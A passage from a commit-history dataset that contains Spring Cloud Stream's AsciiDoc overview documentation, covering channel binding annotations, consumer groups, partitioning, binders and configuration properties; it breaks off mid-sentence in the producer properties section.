Publish some more messages from http:\/\/localhost:8080 or from Cloud Shell `Web Preview`;\nobserve that the additional data is streamed to the `curl` client.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"de7d71255b0bc92b75821cb663b2967553dada26","subject":"Add doc for multiple destination names when binding consumer","message":"Add doc for multiple destination names when binding consumer\n","repos":"dsyer\/spring-cloud-stream,viniciusccarvalho\/spring-cloud-stream,dturanski\/spring-cloud-stream,viniciusccarvalho\/spring-cloud-stream,spring-cloud\/spring-cloud-stream,spring-cloud\/spring-cloud-stream,dsyer\/spring-cloud-stream,markpollack\/spring-cloud-stream,ilayaperumalg\/spring-cloud-stream,markfisher\/spring-cloud-stream,dturanski\/spring-cloud-stream,garyrussell\/spring-cloud-stream,mbogoevici\/spring-cloud-stream,ghillert\/spring-cloud-streams,ilayaperumalg\/spring-cloud-stream,viniciusccarvalho\/spring-cloud-stream,spring-cloud\/spring-cloud-stream,dturanski\/spring-cloud-stream,garyrussell\/spring-cloud-stream,mbogoevici\/spring-cloud-stream,dsyer\/spring-cloud-stream,garyrussell\/spring-cloud-stream,markfisher\/spring-cloud-stream,markfisher\/spring-cloud-stream,markpollack\/spring-cloud-stream,markpollack\/spring-cloud-stream,mbogoevici\/spring-cloud-stream","old_file":"spring-cloud-stream-docs\/src\/main\/asciidoc\/spring-cloud-stream-overview.adoc","new_file":"spring-cloud-stream-docs\/src\/main\/asciidoc\/spring-cloud-stream-overview.adoc","new_contents":"[partintro]\n--\nThis section goes into more detail about how you can work with Spring Cloud Stream.\nIt covers topics such as creating and running stream applications.\n--\n\n== Introducing Spring Cloud Stream\nSpring Cloud Stream is a framework for building message-driven microservice applications.\nSpring Cloud Stream builds upon Spring Boot to create standalone, production-grade Spring applications, and uses Spring Integration to provide connectivity to message brokers.\nIt provides opinionated configuration of middleware from several vendors, introducing the concepts of persistent publish-subscribe semantics, consumer groups, and partitions.\n\nYou can add the `@EnableBinding` annotation to your application to get immediate connectivity to a message broker, and you can add `@StreamListener` to a method to cause it to receive events for stream processing.\nThe following is a simple sink application which receives external messages.\n\n[source,java]\n----\n@SpringBootApplication\npublic class StreamApplication {\n\n public static void main(String[] args) {\n SpringApplication.run(StreamApplication.class, args);\n }\n}\n\n@EnableBinding(Sink.class)\npublic class TimerSource {\n\n ...\n\n @StreamListener(Sink.INPUT)\n public void processVote(Vote vote) {\n votingService.recordVote(vote);\n }\n}\n----\n\nThe `@EnableBinding` annotation takes one or more interfaces as parameters (in this case, the parameter is a single `Sink` interface).\nAn interface declares input and\/or output channels.\nSpring Cloud Stream provides the interfaces `Source`, `Sink`, and `Processor`; you can also define your own interfaces.\n\nThe following is the definition of the `Sink` interface:\n\n[source,java]\n----\npublic interface Sink {\n String INPUT = \"input\";\n\n @Input(Sink.INPUT)\n SubscribableChannel input();\n}\n----\n\nThe `@Input` annotation identifies an _input channel_, through which received messages enter the application; the `@Output` annotation identifies an _output channel_, through which published messages leave the application.\nThe `@Input` and `@Output` annotations can take a channel name as a parameter; if a name is not provided, the name of the annotated method will be used.\n\n
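As a hypothetical illustration (the `VoteStreams` interface and its channel names are made up for this sketch, not part of Spring Cloud Stream), a custom bindable interface could be declared like this:\n\n[source,java]\n----\npublic interface VoteStreams {\n\n \/\/ Channel through which incoming votes enter the application\n @Input(\"incomingVotes\")\n SubscribableChannel incomingVotes();\n\n \/\/ Channel through which audited votes are published\n @Output(\"auditedVotes\")\n MessageChannel auditedVotes();\n}\n----\n\nSuch an interface can then be passed to `@EnableBinding(VoteStreams.class)` in the same way as `Sink` above.\n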
Spring Cloud Stream will create an implementation of the interface for you.\nYou can use this in the application by autowiring it, as in the following example of a test case.\n\n[source,java]\n----\n@RunWith(SpringJUnit4ClassRunner.class)\n@SpringApplicationConfiguration(classes = StreamApplication.class)\n@WebAppConfiguration\n@DirtiesContext\npublic class StreamApplicationTests {\n\n @Autowired\n private Sink sink;\n\n @Test\n public void contextLoads() {\n assertNotNull(this.sink.input());\n }\n}\n----\n\n== Main Concepts\n\nSpring Cloud Stream provides a number of abstractions and primitives that simplify the writing of message-driven microservice applications.\nThis section gives an overview of the following:\n\n* Spring Cloud Stream's application model\n* The Binder abstraction\n* Persistent publish-subscribe support\n* Consumer group support\n* Partitioning support\n* A pluggable Binder API\n\n\n=== Application Model\n\nA Spring Cloud Stream application consists of a middleware-neutral core.\nThe application communicates with the outside world through input and output _channels_ injected into it by Spring Cloud Stream.\nChannels are connected to external brokers through middleware-specific Binder implementations.\n\n.Spring Cloud Stream Application\nimage::SCSt-with-binder.png[width=300,scaledwidth=\"50%\"]\n\n==== Fat JAR\n\nSpring Cloud Stream applications can be run in standalone mode from your IDE for testing.\nTo run a Spring Cloud Stream application in production, you can create an executable (or \"fat\") JAR by using the standard Spring Boot tooling provided for Maven or Gradle.\n\n=== The Binder Abstraction\n\nSpring Cloud Stream provides Binder implementations for https:\/\/github.com\/spring-cloud\/spring-cloud-stream\/tree\/master\/spring-cloud-stream-binders\/spring-cloud-stream-binder-kafka[Kafka], https:\/\/github.com\/spring-cloud\/spring-cloud-stream\/tree\/master\/spring-cloud-stream-binders\/spring-cloud-stream-binder-rabbit[RabbitMQ], https:\/\/github.com\/spring-cloud\/spring-cloud-stream-binder-redis[Redis], and https:\/\/github.com\/spring-cloud\/spring-cloud-stream-binder-gemfire[Gemfire].\nSpring Cloud Stream also includes a https:\/\/github.com\/spring-cloud\/spring-cloud-stream\/blob\/master\/spring-cloud-stream-test-support\/src\/main\/java\/org\/springframework\/cloud\/stream\/test\/binder\/TestSupportBinder.java[TestSupportBinder], which leaves a channel unmodified so that tests can interact with channels directly and reliably assert on what is received.\nYou can use the extensible API to write your own Binder.\n\nSpring Cloud Stream uses Spring Boot for configuration, and the Binder abstraction makes it possible for a Spring Cloud Stream application to be flexible in how it connects to middleware.\nFor example, deployers can dynamically choose, at runtime, the destinations (e.g., the Kafka topics or RabbitMQ exchanges) to which channels connect.\nSuch configuration can be provided through external configuration properties and in any form supported by Spring Boot (including application arguments, environment variables, and `application.yml` or `application.properties` files).\nIn the sink example from the <<_introducing_spring_cloud_stream>> section, setting the application property `spring.cloud.stream.bindings.input.destination` to `raw-sensor-data` will 
cause it to read from the `raw-sensor-data` Kafka topic, or from a queue bound to the `raw-sensor-data` RabbitMQ exchange.\n\nSpring Cloud Stream automatically detects and uses a binder found on the classpath.\nYou can easily use different types of middleware with the same code: just include a different binder at build time.\nFor more complex use cases, you can also package multiple binders with your application and have it choose the binder, and even whether to use different binders for different channels, at runtime.\n\n=== Persistent Publish-Subscribe Support\n\nCommunication between applications follows a publish-subscribe model, where data is broadcast through shared topics.\nThis can be seen in the following figure, which shows a typical deployment for a set of interacting Spring Cloud Stream applications.\n\n.Spring Cloud Stream Publish-Subscribe\nimage::SCSt-sensors.png[width=300,scaledwidth=\"50%\"]\n\nData reported by sensors to an HTTP endpoint is sent to a common destination named `raw-sensor-data`.\nFrom the destination, it is independently processed by a microservice application that computes time-windowed averages and by another microservice application that ingests the raw data into HDFS.\nIn order to process the data, both applications declare the topic as their input at runtime.\n\nThe publish-subscribe communication model reduces the complexity of both the producer and the consumer, and allows new applications to be added to the topology without disruption of the existing flow.\nFor example, downstream from the average-calculating application, you can add an application that calculates the highest temperature values for display and monitoring.\nYou can then add another application that interprets the same flow of averages for fault detection.\nDoing all communication through shared topics rather than point-to-point queues reduces coupling between microservices.\n\nWhile the concept of publish-subscribe messaging is not new, Spring Cloud Stream takes the extra step of making it an opinionated choice for its application model.\nBy using native middleware support, Spring Cloud Stream also simplifies use of the publish-subscribe model across different platforms.\n\n[[consumer-groups]]\n=== Consumer Groups\nWhile the publish-subscribe model makes it easy to connect applications through shared topics, the ability to scale up by creating multiple instances of a given application is equally important.\nWhen doing this, different instances of an application are placed in a competing consumer relationship, where only one of the instances is expected to handle a given message.\n\nSpring Cloud Stream models this behavior through the concept of a _consumer group_.\n(Spring Cloud Stream consumer groups are similar to and inspired by Kafka consumer groups.)\nEach consumer binding can use the `spring.cloud.stream.bindings.input.group` property to specify a group name.\nFor the consumers shown in the following figure, this property would be set as `spring.cloud.stream.bindings.input.group=hdfsWrite` or `spring.cloud.stream.bindings.input.group=average`.\n\n.Spring Cloud Stream Consumer Groups\nimage::SCSt-groups.png[width=300,scaledwidth=\"50%\"]\n\nAll groups which subscribe to a given destination receive a copy of published data, but only one member of each group receives a given message from that destination.\nBy default, when a group is not specified, Spring Cloud Stream assigns the application to an anonymous and independent single-member consumer group that is in a 
publish-subscribe relationship with all other consumer groups.\n\n[[durability]]\n==== Durability\n\nConsistent with the opinionated application model of Spring Cloud Stream, consumer group subscriptions are _durable_.\nThat is, a binder implementation ensures that group subscriptions are persistent, and once at least one subscription for a group has been created, the group will receive messages, even if they are sent while all applications in the group are stopped.\n\n[NOTE]\n====\nAnonymous subscriptions are non-durable by nature.\nFor some binder implementations (e.g., RabbitMQ), it is possible to have non-durable group subscriptions.\n====\n\nIn general, it is preferable to always specify a consumer group when binding an application to a given destination.\nWhen scaling up a Spring Cloud Stream application, you must specify a consumer group for each of its input bindings.\nThis prevents the application's instances from receiving duplicate messages (unless that behavior is desired, which is unusual).\n\n[[partitioning]]\n=== Partitioning Support\n\nSpring Cloud Stream provides support for _partitioning_ data between multiple instances of a given application.\nIn a partitioned scenario, the physical communication medium (e.g., the broker topic) is viewed as being structured into multiple partitions.\nOne or more producer application instances send data to multiple consumer application instances and ensure that data identified by common characteristics are processed by the same consumer instance.\n\nSpring Cloud Stream provides a common abstraction for implementing partitioned processing use cases in a uniform fashion.\nPartitioning can thus be used whether the broker itself is naturally partitioned (e.g., Kafka) or not (e.g., RabbitMQ).\n\n.Spring Cloud Stream Partitioning\nimage::SCSt-partitioning.png[width=300,scaledwidth=\"50%\"]\n\nPartitioning is a critical concept in stateful processing, where it is critiical, for either performance or consistency reasons, to ensure that all related data is processed together.\nFor example, in the time-windowed average calculation example, it is important that all measurements from any given sensor are processed by the same application instance.\n\n[NOTE]\n====\nTo set up a partitioned processing scenario, you must configure both the data-producing and the data-consuming ends.\n====\n\n== Programming Model\n\nThis section describes Spring Cloud Stream's programming model.\nSpring Cloud Stream provides a number of predefined annotations for declaring bound input and output channels as well as how to listen to channels.\n\n=== Declaring and Binding Channels\n\n==== Triggering Binding Via `@EnableBinding`\n\nYou can turn a Spring application into a Spring Cloud Stream application by applying the `@EnableBinding` annotation to one of the application's configuration classes.\nThe `@EnableBinding` annotation itself is meta-annotated with `@Configuration` and triggers the configuration of Spring Cloud Stream infrastructure:\n\n[source,java]\n----\n...\n@Import(...)\n@Configuration\n@EnableIntegration\npublic @interface EnableBinding {\n ...\n Class<?>[] value() default {};\n}\n----\n\nThe `@EnableBinding` annotation can take as parameters one or more interface classes that contain methods which represent bindable components (typically message channels).\n\n[NOTE]\n====\nIn Spring Cloud Stream 1.0, the only supported bindable components are the Spring Messaging `MessageChannel` and its extensions `SubscribableChannel` and `PollableChannel`.\nFuture 
versions should extend this support to other types of components, using the same mechanism.\nIn this documentation, we will continue to refer to channels.\n====\n\n==== `@Input` and `@Output`\n\nA Spring Cloud Stream application can have an arbitrary number of input and output channels defined in an interface as `@Input` and `@Output` methods:\n\n[source,java]\n----\npublic interface Barista {\n\n @Input\n SubscribableChannel orders();\n\n @Output\n MessageChannel hotDrinks();\n\n @Output\n MessageChannel coldDrinks();\n}\n----\n\nUsing this interface as a parameter to `@EnableBinding` will trigger the creation of three bound channels named `orders`, `hotDrinks`, and `coldDrinks`, respectively.\n\n[source,java]\n----\n@EnableBinding(Barista.class)\npublic class CafeConfiguration {\n\n ...\n}\n----\n\n===== Customizing Channel Names\n\nUsing the `@Input` and `@Output` annotations, you can specify a customized channel name for the channel, as shown in the following example:\n\n[source,java]\n----\npublic interface Barista {\n ...\n @Input(\"inboundOrders\")\n SubscribableChannel orders();\n}\n----\n\nIn this example, the created bound channel will be named `inboundOrders`.\n\n===== `Source`, `Sink`, and `Processor`\n\nFor easy addressing of the most common use cases, which involve either an input channel, an output channel, or both, Spring Cloud Stream provides three predefined interfaces out of the box.\n\n`Source` can be used for an application which has a single outbound channel.\n\n[source,java]\n----\npublic interface Source {\n\n String OUTPUT = \"output\";\n\n @Output(Source.OUTPUT)\n MessageChannel output();\n\n}\n----\n\n`Sink` can be used for an application which has a single inbound channel.\n\n[source,java]\n----\npublic interface Sink {\n\n String INPUT = \"input\";\n\n @Input(Sink.INPUT)\n SubscribableChannel input();\n\n}\n----\n\n`Processor` can be used for an application which has both an inbound channel and an outbound channel.\n\n[source,java]\n----\npublic interface Processor extends Source, Sink {\n}\n----\n\nSpring Cloud Stream provides no special handling for any of these interfaces; they are only provided out of the box.\n\n==== Accessing Bound Channels\n\n===== Injecting the Bound Interfaces\n\nFor each bound interface, Spring Cloud Stream will generate a bean that implements the interface.\nInvoking a `@Input`-annotated or `@Output`-annotated method of one of these beans will return the relevant bound channel.\n\nThe bean in the following example sends a message on the output channel when its `hello` method is invoked.\nIt invokes `output()` on the injected `Source` bean to retrieve the target channel.\n\n[source,java]\n----\n@Component\npublic class SendingBean {\n\n private Source source;\n\n @Autowired\n public SendingBean(Source source) {\n this.source = source;\n }\n\n public void sayHello(String name) {\n source.output().send(MessageBuilder.withPayload(body).build());\n }\n}\n----\n\n===== Injecting Channels Directly\n\nBound channels can be also injected directly:\n\n[source, java]\n----\n@Component\npublic class SendingBean {\n\n private MessageChannel output;\n\n @Autowired\n public SendingBean(MessageChannel output) {\n this.output = output;\n }\n\n public void sayHello(String name) {\n output.send(MessageBuilder.withPayload(body).build());\n }\n}\n----\n\nIf the name of the channel is customized on the declaring annotation, that name should be used instead of the method name.\nGiven the following declaration:\n\n[source,java]\n----\npublic interface 
CustomSource {\n ...\n @Output(\"customOutput\")\n MessageChannel output();\n}\n----\n\nThe channel will be injected as shown in the following example:\n\n[source, java]\n----\n@Component\npublic class SendingBean {\n\n @Autowired\n private MessageChannel output;\n\n @Autowired @Qualifier(\"customOutput\")\n public SendingBean(MessageChannel output) {\n this.output = output;\n }\n\n public void sayHello(String name) {\n customOutput.send(MessageBuilder.withPayload(body).build());\n }\n}\n----\n\n==== Producing and Consuming Messages\n\nYou can write a Spring Cloud Stream application using either Spring Integration annotations or Spring Cloud Stream's `@StreamListener` annotation.\nThe `@StreamListener` annotation is modeled after other Spring Messaging annotations (such as `@MessageMapping`, `@JmsListener`, `@RabbitListener`, etc.) but adds content type management and type coercion features.\n\n===== Native Spring Integration Support\n\nBecause Spring Cloud Stream is based on Spring Integration, Stream completely inherits Integration's foundation and infrastructure as well as the component itself.\nFor example, you can attach the output channel of a `Source` to a `MessageSource`:\n\n[source, java]\n----\n@EnableBinding(Source.class)\npublic class TimerSource {\n\n @Value(\"${format}\")\n private String format;\n\n @Bean\n @InboundChannelAdapter(value = Source.OUTPUT, poller = @Poller(fixedDelay = \"${fixedDelay}\", maxMessagesPerPoll = \"1\"))\n public MessageSource<String> timerMessageSource() {\n return () -> new GenericMessage<>(new SimpleDateFormat(format).format(new Date()));\n }\n}\n----\n\nOr you can use a processor's channels in a transformer:\n\n[source,java]\n----\n@EnableBinding(Processor.class)\npublic class TransformProcessor {\n @Transformer(inputChannel = Processor.INPUT, outputChannel = Processor.OUTPUT)\n public Object transform(String message) {\n return message.toUpper();\n }\n}\n----\n\n===== Using @StreamListener for Automatic Content Type Handling\n\nComplementary to its Spring Integration support, Spring Cloud Stream provides its own `@StreamListener` annotation, modeled after other Spring Messaging annotations (e.g. 
`@MessageMapping`, `@JmsListener`, `@RabbitListener`, etc.).\nThe `@StreamListener` annotation provides a simpler model for handling inbound messages, especially when dealing with use cases that involve content type management and type coercion.\n\nSpring Cloud Stream provides an extensible `MessageConverter` mechanism for handling data conversion by bound channels and for, in this case, dispatching to methods annotated with `@StreamListener`.\nThe following is an example of an application which processes external `Vote` events:\n\n[source,java]\n----\n@EnableBinding(Sink.class)\npublic class VoteHandler {\n\n @Autowired\n VotingService votingService;\n\n @StreamListener(Sink.INPUT)\n public void handle(Vote vote) {\n votingService.record(vote);\n }\n}\n----\n\nThe distinction between `@StreamListener` and a Spring Integration `@ServiceActivator` is seen when considering an inbound `Message` that has a `String` payload and a `contentType` header of `application\/json`.\nIn the case of `@StreamListener`, the `MessageConverter` mechanism will use the `contentType` header to parse the `String` payload into a `Vote` object.\n\nAs with other Spring Messaging methods, method arguments can be annotated with `@Payload`, `@Headers` and `@Header`.\n\n[NOTE]\n====\nFor methods which return data, you must use the `@SendTo` annotation to specify the output binding destination for data returned by the method:\n\n[source,java]\n----\n@EnableBinding(Processor.class)\npublic class TransformProcessor {\n\n @Autowired\n VotingService votingService;\n\n @StreamListener(Processor.INPUT)\n @SendTo(Processor.OUTPUT)\n public VoteResult handle(Vote vote) {\n return votingService.record(vote);\n }\n}\n----\n====\n\n[NOTE]\n====\nIn the case of RabbitMQ, content type headers can be set by external applications.\nSpring Cloud Stream supports them as part of an extended internal protocol used for any type of transport (including transports, such as Kafka, that do not normally support headers).\n====\n\n==== Aggregation\n\nSpring Cloud Stream provides support for aggregating multiple applications together, connecting their input and output channels directly and avoiding the additional cost of exchanging messages via a broker.\nAs of version 1.0 of Spring Cloud Stream, aggregation is supported only for the following types of applications:\n\n* _sources_ - applications with a single output channel named `output`, typically having a single binding of the type `org.springframework.cloud.stream.messaging.Source`\n* _sinks_ - applications with a single input channel named `input`, typically having a single binding of the type `org.springframework.cloud.stream.messaging.Sink`\n* _processors_ - applications with a single input channel named `input` and a single output channel named `output`, typically having a single binding of the type `org.springframework.cloud.stream.messaging.Processor`.\n\nThey can be aggregated together by creating a sequence of interconnected applications, in which the output channel of an element in the sequence is connected to the input channel of the next element, if it exists.\nA sequence can start with either a _source_ or a _processor_, it can contain an arbitrary number of _processors_ and must end with either a _processor_ or a _sink_.\n\nDepending on the nature of the starting and ending element, the sequence may have one or more bindable channels, as follows:\n\n* if the sequence starts with a source and ends with a sink, all communication between the applications is direct and no channels 
will be bound\n* if the sequence starts with a processor, then its input channel will become the `input` channel of the aggregate and will be bound accordingly\n* if the sequence ends with a processor, then its output channel will become the `output` channel of the aggregate and will be bound accordingly\n\nAggregation is performed using the `AggregateApplicationBuilder` utility class, as in the following example.\nLet's consider a project in which we have source, processor and a sink, which may be defined in the project, or may be contained in one of the project's dependencies.\n\n[source,java]\n----\n@SpringBootApplication\n@EnableBinding(Sink.class)\npublic class SinkApplication {\n\n\tprivate static Logger logger = LoggerFactory.getLogger(SinkModuleDefinition.class);\n\n\t@ServiceActivator(inputChannel=Sink.INPUT)\n\tpublic void loggerSink(Object payload) {\n\t\tlogger.info(\"Received: \" + payload);\n\t}\n}\n----\n\n[source,java]\n----\n@SpringBootApplication\n@EnableBinding(Processor.class)\npublic class ProcessorApplication {\n\n\t@Transformer\n\tpublic String loggerSink(String payload) {\n\t\treturn payload.toUpperCase();\n\t}\n}\n----\n\n[source,java]\n----\n@SpringBootApplication\n@EnableBinding(Source.class)\npublic class SourceApplication {\n\n\t@Bean\n\t@InboundChannelAdapter(value = Source.OUTPUT)\n\tpublic String timerMessageSource() {\n\t\treturn new SimpleDateFormat().format(new Date());\n\t}\n}\n----\n\nEach configuration can be used for running a separate component, but in this case they can be aggregated together as follows:\n\n[source,java]\n----\n@SpringBootApplication\npublic class SampleAggregateApplication {\n\n\tpublic static void main(String[] args) {\n\t\tnew AggregateApplicationBuilder()\n\t\t\t.from(SourceApplication.class).args(\"--fixedDelay=5000\")\n\t\t\t.via(ProcessorApplication.class)\n\t\t\t.to(SinkApplication.class).args(\"--debug=true\").run(args);\n\t}\n}\n----\n\nThe starting component of the sequence is provided as argument to the `from()` method.\nThe ending component of the sequence is provided as argument to the `to()` method.\nIntermediate processors are provided as argument to the `via()` method.\nMultiple processors of the same type can be chained together (e.g. 
for pipelining transformations with different configurations).\nFor each component, the builder can provide runtime arguments for Spring Boot configuration.\n\n\n==== RxJava support\n\nSpring Cloud Stream provides support for RxJava-based processors through the `RxJavaProcessor` available in `spring-cloud-stream-rxjava`.\n\n[source,java]\n----\npublic interface RxJavaProcessor<I, O> {\n\tObservable<O> process(Observable<I> input);\n}\n----\n\nAn implementation of `RxJavaProcessor` will receive `Observable` as an input that represents the flow of inbound message payloads.\nThe `process` method is invoked once at startup for setting up the data flow.\n\nYou can enable the use of RxJava-based processors and use them in your processor application by using the `@EnableRxJavaProcessor` annotation.\n`@EnableRxJavaProcessor` is meta-annotated with `@EnableBinding(Processor.class)` and will create the `Processor` binding.\nHere is an example of an RxJava-based processor:\n\n[source,java]\n----\n@EnableRxJavaProcessor\npublic class RxJavaTransformer {\n\n\tprivate static Logger logger = LoggerFactory.getLogger(RxJavaTransformer.class);\n\n\t@Bean\n\tpublic RxJavaProcessor<String,String> processor() {\n\t\treturn inputStream -> inputStream.map(data -> {\n\t\t\tlogger.info(\"Got data = \" + data);\n\t\t\treturn data;\n\t\t})\n\t\t.buffer(5)\n\t\t.map(data -> String.valueOf(avg(data)));\n\t}\n\n\tprivate static Double avg(List<String> data) {\n\t\tdouble sum = 0;\n\t\tdouble count = 0;\n\t\tfor(String d : data) {\n\t\t\tcount++;\n\t\t\tsum += Double.valueOf(d);\n\t\t}\n\t\treturn sum\/count;\n\t}\n}\n----\n\n\n[NOTE]\n====\nWhen implementing an RxJava processor, it is important to handle exceptions as part of your processing flow.\nUncaught exceptions will be treated as errors by RxJava and will cause the `Observable` to complete, disrupting the flow.\n====\n\n== Binders\n\nSpring Cloud Stream provides a Binder abstraction for use in connecting to physical destinations at the external middleware.\nThis section provides information about the main concepts behind the Binder SPI, its main components, and implementation-specific details.\n\n=== Producers and Consumers\n\n.Producers and Consumers\nimage::producers-consumers.png[width=300,scaledwidth=\"75%\"]\n\nA _producer_ is any component that sends messages to a channel.\nThe channel can be bound to an external message broker via a Binder implementation for that broker.\nWhen invoking the `bindProducer()` method, the first parameter is the name of the destination within the broker, the second parameter is the local channel instance to which the producer will send messages, and the third parameter contains properties (such as a partition key expression) to be used within the adapter that is created for that channel.\n\nA _consumer_ is any component that receives messages from a channel.\nAs with a producer, the consumer's channel can be bound to an external message broker.\nWhen invoking the `bindConsumer()` method, the first parameter is the destination name, and a second parameter provides the name of a logical group of consumers.\nEach group that is represented by consumer bindings for a given destination receives a copy of each message that a producer sends to that destination (i.e., publish-subscribe semantics).\nIf there are multiple consumer instances bound using the same group name, then messages will be load-balanced across those consumer instances so that each message sent by a producer is consumed by only a single consumer instance within each 
group (i.e., queueing semantics).\n\n=== Binder SPI\n\nThe Binder SPI consists of a number of interfaces, out-of-the box utility classes and discovery strategies that provide a pluggable mechanism for connecting to external middleware.\n\nThe key point of the SPI is the `Binder` interface which is a strategy for connecting inputs and outputs to external middleware.\n\n[source,java]\n----\npublic interface Binder<T, C extends ConsumerProperties, P extends ProducerProperties> {\n\tBinding<T> bindConsumer(String name, String group, T inboundBindTarget, C consumerProperties);\n\n\tBinding<T> bindProducer(String name, T outboundBindTarget, P producerProperties);\n}\n----\n\nThe interface is parameterized, offering a number of extension points:\n\n* input and output bind targets - as of version 1.0, only `MessageChannel` is supported, but this is intended to be used as an extension point in the future;\n* extended consumer and producer properties - allowing specific Binder implementations to add supplemental properties which can be supported in a type-safe manner.\n\nA typical binder implementation consists of the following\n\n* a class that implements the `Binder` interface;\n* a Spring `@Configuration` class that creates a bean of the type above along with the middleware connection infrastructure;\n* a `META-INF\/spring.binders` file found on the classpath containing one or more binder definitions, e.g.\n\n```\nkafka:\\\norg.springframework.cloud.stream.binder.kafka.config.KafkaBinderConfiguration\n```\n\n=== Binder Detection\n\nSpring Cloud Stream relies on implementations of the Binder SPI to perform the task of connecting channels to message brokers.\nEach Binder implementation typically connects to one type of messaging system.\nOut of the box, Spring Cloud Stream provides binders for Kafka, RabbitMQ, and Redis.\n\n==== Classpath Detection\n\nBy default, Spring Cloud Stream relies on Spring Boot's auto-configuration to configure the binding process.\nIf a single Binder implementation is found on the classpath, Spring Cloud Stream will use it automatically.\nFor example, a Spring Cloud Stream project that aims to bind only to RabbitMQ can simply add the following dependency:\n\n[source,xml]\n----\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-stream-binder-rabbit<\/artifactId>\n<\/dependency>\n----\n\n[[multiple-binders]]\n=== Multiple Binders on the Classpath\n\nWhen multiple binders are present on the classpath, the application must indicate which binder is to be used for each channel binding.\nEach binder configuration contains a `META-INF\/spring.binders`, which is a simple properties file:\n\n[source]\n----\nrabbit:\\\norg.springframework.cloud.stream.binder.rabbit.config.RabbitServiceAutoConfiguration\n----\n\nSimilar files exist for the other provided binder implementations (e.g., Kafka), and custom binder implementations are expected to provide them, as well.\nThe key represents an identifying name for the binder implementation, whereas the value is a comma-separated list of configuration classes that each contain one and only one bean definition of type `org.springframework.cloud.stream.binder.Binder`.\n\nBinder selection can either be performed globally, using the `spring.cloud.stream.defaultBinder` property (e.g., `spring.cloud.stream.defaultBinder=rabbit`) or individually, by configuring the binder on each channel binding.\nFor instance, a processor application which reads from Kafka and writes to RabbitMQ can specify the following 
configuration:\n\n----\nspring.cloud.stream.bindings.input.binder=kafka\nspring.cloud.stream.bindings.output.binder=rabbit\n----\n\n=== Connecting to Multiple Systems\n\nBy default, binders share the application's Spring Boot auto-configuration, so that one instance of each binder found on the classpath will be created.\nIf your application should connect to more than one broker of the same type, you can specify multiple binder configurations, each with different environment settings.\n\n[NOTE]\n====\nTurning on explicit binder configuration will disable the default binder configuration process altogether.\nIf you do this, all binders in use must be included in the configuration.\n====\n\nFor example, this is the typical configuration for a processor application which connects to two RabbitMQ broker instances:\n\n[source,yml]\n----\nspring:\n cloud:\n stream:\n bindings:\n input:\n destination: foo\n binder: rabbit1\n output:\n destination: bar\n binder: rabbit2\n binders:\n rabbit1:\n type: rabbit\n environment:\n spring:\n rabbitmq:\n host: <host1>\n rabbit2:\n type: rabbit\n environment:\n spring:\n rabbitmq:\n host: <host2>\n----\n\n\n=== Implementation strategies\n\nThis section details the binder implementation strategies for Kafka and Rabbit MQ, in what concerns mapping the Spring Cloud Stream concepts onto the middleware concepts.\n\n==== Kafka Binder\n\n.Kafka Binder\nimage::kafka-binder.png[width=300,scaledwidth=\"50%\"]\n\nThe Kafka Binder implementation maps the destination to a Kafka topic.\nThe consumer group maps directly to the same Kafka concept.\nSpring Cloud Stream does not use the high-level consumer, but implements a similar concept for the simple consumer.\n\n\n==== RabbitMQ Binder\n\n.RabbitMQ Binder\nimage::rabbit-binder.png[width=300,scaledwidth=\"50%\"]\n\nThe RabbitMQ Binder implementation maps the destination to a `TopicExchange`.\nFor each consumer group, a `Queue` will be bound to that `TopicExchange`.\nEach consumer instance that binds will trigger creation of a corresponding RabbitMQ `Consumer` instance for its group's `Queue`.\n\n== Configuration Options\n\nSpring Cloud Stream supports general configuration options as well as configuration for bindings and binders.\nSome binders allow additional binding properties to support middleware-specific features.\n\nConfiguration options can be provided to Spring Cloud Stream applications via any mechanism supported by Spring Boot.\nThis includes application arguments, environment variables, and YAML or .properties files.\n\n=== Spring Cloud Stream Properties\n\nspring.cloud.stream.instanceCount::\n The number of deployed instances of an application.\nMust be set for partitioning and if using Kafka.\n+\nDefault: `1`.\n\nspring.cloud.stream.instanceIndex::\n The instance index of the application: a number from `0` to `instanceCount`-1.\nUsed for partitioning and with Kafka.\nAutomatically set in Cloud Foundry to match the application's instance index.\nspring.cloud.stream.dynamicDestinations::\n A list of destinations that can be bound dynamically (for example, in a dynamic routing scenario).\nIf set, only listed destinations can be bound.\n+\nDefault: empty (allowing any destination to be bound).\n\nspring.cloud.stream.defaultBinder::\n The default binder to use, if multiple binders are configured.\nSee <<multiple-binders,Multiple Binders on the Classpath>>.\n\n[[binding-properties]]\n=== Binding Properties\n\nBinding properties are supplied using the format 
`spring.cloud.stream.bindings.<channelName>.<property>=<value>`.\nThe `<channelName>` represents the name of the channel being configured (e.g., `output` for a `Source`).\n\nIn what follows, we indicate where we have omitted the `spring.cloud.stream.bindings.<channelName>.` prefix and focus just on the property name, with the understanding that the prefix will be included at runtime.\n\n==== Properties for Use of Spring Cloud Stream\n\nThe following binding properties are available for both input and output bindings and\nmust be prefixed with `spring.cloud.stream.bindings.<channelName>.`.\n\ndestination::\n The target destination of a channel on the bound middleware (e.g., the RabbitMQ exchange or Kafka topic).\n If the channel is bound as a consumer, it could be bound to multiple destinations and the destination names can be specified as comma separated String values.\n If not set, the channel name is used instead.\ngroup::\n The consumer group of the channel.\nApplies only to inbound bindings.\nSee <<consumer-groups,Consumer Groups>>.\n+\nDefault: null (indicating an anonymous consumer).\ncontentType::\n The content type of the channel.\n\/\/See <<content type management>>.\n+\nDefault: null (so that no type coercion is performed).\nbinder::\n The binder used by this binding.\nSee <<multiple-binders>> for details.\n+\nDefault: null (the default binder will be used, if one exists).\n\n==== Consumer properties\n\nThe following binding properties are available for input bindings only and must be prefixed with `spring.cloud.stream.bindings.<channelName>.consumer.`.\n\nconcurrency::\n The concurrency of the inbound consumer.\n+\nDefault: `1`.\npartitioned::\n Whether the consumer receives data from a partitioned producer.\n+\nDefault: `false`.\nheaderMode::\n When set to `raw`, disables header parsing on input.\nEffective only for messaging middleware that does not support message headers natively and requires header embedding.\nUseful when inbound data is coming from outside Spring Cloud Stream applications.\n+\nDefault: `embeddedHeaders`.\nmaxAttempts::\n The number of attempts of re-processing an inbound message.\nCurrently ignored by Kafka.\n+\nDefault: `3`.\nbackOffInitialInterval::\n The backoff initial interval on retry.\nCurrently ignored by Kafka.\n+\nDefault: `1000`.\nbackOffMaxInterval::\n The maximum backoff interval.\nCurrently ignored by Kafka.\n+\nDefault: `10000`.\nbackOffMultiplier::\n The backoff multiplier.\n+\nDefault: `2.0`.\n\n==== Producer Properties\n\nThe following binding properties are 